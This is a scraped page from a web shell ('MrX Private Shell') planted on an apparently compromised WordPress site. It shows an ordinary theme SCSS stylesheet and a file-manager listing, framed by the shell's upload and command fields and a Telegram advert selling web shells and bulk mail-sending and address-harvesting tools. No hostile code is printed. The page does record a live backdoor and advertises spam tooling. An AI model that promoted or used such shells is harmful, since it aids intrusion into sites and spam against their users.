__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
.ct-control,
.ct-controls-group {
	position: relative;
	padding: var(--options-horizontal-spacing, 0 14px);
	margin-top: var(--options-vertical-spacing, 25px);

	> header {

		&:not(:empty) {
			display: flex;
			align-items: center;
			justify-content: space-between;
			column-gap: 10px;
			position: relative;
		}

		label {
			font-size: 12px;
			font-weight: 500;
			letter-spacing: 0.1px;
			cursor: default;
			width: initial;
			margin: 0;
		}
	}

	// inline
	&[data-design='inline'] {
		display: grid;
		grid-template-columns: 1fr auto;
		grid-column-gap: 10px;

		> header {

			label {
				display: flex;
				align-items: center;
			}
		}

		&[data-divider]:before,
		&[data-divider]:after,
		.ct-option-description {
			grid-column: 1/-1;
		}
	}


	// block
	&[data-design*='block'] {
		
		> header {
			// &:not(:empty)
			&:not([data-label="no"]) {
				margin-bottom: 10px;
			}
		}
	}

	// block right
	&[data-design='block:right'] {
		display: flex;
		flex-direction: column;

		> section {
			align-self: flex-end;
		}
	}
}


.ct-options-container {
	
	.customize-control-ct-options {
		display: block !important;
	}

	// control options
	.ct-control-options {
		display: flex;
		align-self: start;
		margin-top: 2px;
	}


	// title
	.ct-title {
		h3 {
			display: flex;
			align-items: center;
			color: #484f56;
			font-size: 13px !important;
			font-weight: 600;
			margin: 0;
			text-transform: initial;
		}
		
		&:not(:first-child) {
			padding-top: var(--title-option-vertical-spacing, 30px);
			border-top: 1px solid var(--optionBorderColor);
		}

		&[data-type*="simple"] {
			width: calc(100% + var(--title-option-margin-inline, 12px) * 2);
			margin-inline: calc(var(--title-option-margin-inline, 12px) * -1);
			margin-top: var(--title-option-vertical-spacing, 30px);
			padding-inline: var(--title-option-padding-inline, 26px);
			box-sizing: border-box;
		}

		&[data-type*="small-heading"] {
			margin-top: 25px;
			padding-top: 25px;

			h3 {
				font-size: 12px !important;
			}
		}

		&[data-type*="small-divider"] {
			padding-top: 25px;
			margin: 25px 14px 0 14px;
		}

		&[data-type*="no-border"] {
			border-top: 0;
			padding-top: 0;

			&:first-child {
				margin-top: var(--title-option-vertical-spacing, 30px);	
			}
		}

		&[data-type*="menu-location"] {
			width: calc(100% + 24px);
			margin-top: 21px;
			margin-inline: -12px;
			padding: 0 26px;
			box-sizing: border-box;
			border-top: none;

			h3 {
				padding: 10px;
				border-radius: 3px;
				border: 1px dashed #cecece;
				background: rgba(255, 255, 255, 0.5);
			}
		}
	}

	.ct-panel-options-header + .ct-title {
		padding-top: 0;
		border-top: none;

		h3 {
			font-size: 12px !important;
		}
	}


	// layers
	.ct-layer {
		box-shadow: 0 1px 1px rgba(0, 0, 0, 0.02);
	}

	// select
	[data-design="inline"] {
		.ct-option-input,
		.ct-select-input {
			max-width: var(--select-input-width, 130px);
		}
	}

	// option heading divider
	[data-label='heading-label'] {
		header > label {
			font-size: 13px;
			font-weight: 600;
			color: #484f56;
		}
	}

	// option notification
	.ct-notification {
		padding: 0 14px;
		margin-top: 20px;
	}
}

// divider
.ct-divider {

	&:before {
		content: '';
		display: block;
		height: 1px;
		background: var(--optionBorderColor);
	}

	&:not([data-type]) {
		margin: var(--divider-option-vertical-spacing, 30px) 0;

		&:before {
			width: calc(100% + var(--divider-option-margin-inline, 12px) * 2);
			margin-inline: calc(var(--divider-option-margin-inline, 12px) * -1);
		}
	}

	&[data-type="full-small"] {
		margin: 20px 0;

		&:before {
			width: calc(100% + 24px);
			margin: 0 -12px;
		}
	}

	&[data-type="small"] {
		margin: 25px 0;

		&:before {
			opacity: 0.8;
			width: calc(100% - 24px);
			margin: 0 12px;
		}
	}
}

// option description
.ct-option-description {
	flex: 0 0 100%;
	font-size: 12px;
	line-height: 1.5;
	font-style: italic;
	opacity: 0.65;
	color: rgba(85, 93, 102, 1);
	margin: 10px 0 0 0;
	transition: opacity 0.1s ease;

	a {
		color: inherit;
		text-decoration: none;
		transition: color 0.1s ease;

		&:hover {
			color: var(--ui-accent-color);
			text-decoration: underline;
		}
	}
}

.ct-title,
.ct-control {
	&:hover {
		> .ct-option-description {
			opacity: 1;
		}
	}
}

// control with divider
[data-divider] {

	&:before, &:after {
		display: block;
		width: 100%;
		border-bottom: 1px var(--option-border-style, solid) var(--optionBorderColor);
	}
}

[data-divider*="top"]:not(:first-child) {
	&:before {
		content: '';
		margin-bottom: var(--options-vertical-spacing, 25px);
	}
}

[data-divider*="bottom"]:not(:last-child) {
	&:after {
		content: '';
		margin-top: var(--options-vertical-spacing, 25px);
	}
}

[data-divider*="full"] {
	&:before, &:after {
		width: calc(100% + 52px);
		margin: 0 -26px;
	}
}

// option modal
.wp-customizer {
	.ct-option-modal {
		inset-inline-start: 12px;
	}
}

// reset button styles
.ct-reset-styles {
	appearance: none;
	border: 0;
	padding: initial;
	background: transparent;
}

Filemanager

Name Type Size Permission Actions
background Folder 0750
color Folder 0750
modal Folder 0750
animated-checkbox.scss File 1.82 KB 0640
attachment.scss File 1017 B 0640
border.scss File 606 B 0640
box-shadow.scss File 1.92 KB 0640
buttons-group.scss File 2.42 KB 0640
checkbox.scss File 1.03 KB 0640
ct-inner-layers.scss File 163 B 0640
ct-layers.scss File 2.67 KB 0640
ct-panel.scss File 4.56 KB 0640
ct-select.scss File 3.05 KB 0640
date-picker.scss File 1.28 KB 0640
devices.scss File 693 B 0640
file-uploader.scss File 49 B 0640
general.scss File 4.88 KB 0640
icon-picker.scss File 2.52 KB 0640
image-picker.scss File 1.89 KB 0640
image-position.scss File 198 B 0640
input.scss File 1.09 KB 0640
labeled-group.scss File 249 B 0640
main.scss File 1.79 KB 0640
modal-tabs.scss File 785 B 0640
more-options-trigger.scss File 1.02 KB 0640
notification.scss File 547 B 0640
number.scss File 1.32 KB 0640
option-modal.scss File 1.09 KB 0640
option-state.scss File 144 B 0640
options-group.scss File 815 B 0640
options-inherit-state.scss File 616 B 0640
options-rtl.scss File 728 B 0640
options-type-gutenberg.scss File 2.43 KB 0640
radio.scss File 1.85 KB 0640
ratio-picker.scss File 3.43 KB 0640
responsive-controls.scss File 321 B 0640
revert.scss File 1.28 KB 0640
root-styles.scss File 67 B 0640
slider.scss File 2.41 KB 0640
spacing.scss File 1.17 KB 0640
switch.scss File 782 B 0640
tabs.scss File 2.23 KB 0640
taxonomies-options.scss File 207 B 0640
textarea.scss File 507 B 0640
thumbnail-actions.scss File 2.61 KB 0640
time-picker.scss File 183 B 0640
tools-panel-component.scss File 481 B 0640
tooltip.scss File 2.24 KB 0640
typography.scss File 9.15 KB 0640
upload-button.scss File 372 B 0640
value-changer.scss File 3.48 KB 0640
visibility.scss File 27 B 0640
widgets-areas-screen.scss File 740 B 0640
widgets-block-area.scss File 820 B 0640
widgets-common.scss File 1.03 KB 0640
woo-accordion.scss File 1.16 KB 0640
woo-image-variations.scss File 372 B 0640
woo-numbers.scss File 187 B 0640
wp-editor.scss File 379 B 0640
Filemanager